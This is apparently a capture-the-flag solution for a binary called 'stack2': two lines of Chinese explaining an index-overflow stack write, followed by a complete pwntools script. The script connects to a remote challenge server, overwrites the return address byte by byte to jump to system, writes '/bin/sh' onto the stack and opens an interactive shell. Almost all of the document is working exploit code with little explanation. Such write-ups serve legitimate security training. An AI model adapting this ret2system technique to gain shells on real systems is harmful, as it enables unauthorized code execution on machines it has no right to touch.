索引溢出可修改栈，给的hackhere不管用，需要ret2system处，在栈上第二个位置地址处构建/bin/sh（还好这里指向一个栈上地址）

from pwn import * 
def change(index,content):
	p.recvuntil("5. exit\n")
	p.sendline("3")
	p.recvuntil("which number to change:\n")
	p.sendline(index)
	p.recvuntil("new number:\n")
	p.sendline(content)

#p = process("./stack2")
p = remote("111.198.29.45", 43506)
#gdb.attach(p, "b * 0x080488f2")
p.recvuntil("How many numbers you have:\n")
p.sendline("0")

change("132","80")
change("133","132")
change("134","4")
change("135","8")

change("284","47")
change("285","98")
change("286","105")
change("287","110")
change("288","47")
change("289","115")
change("290","104")
change("291","0")

p.recvuntil("5. exit\n")
p.sendline("5")
p.interactive()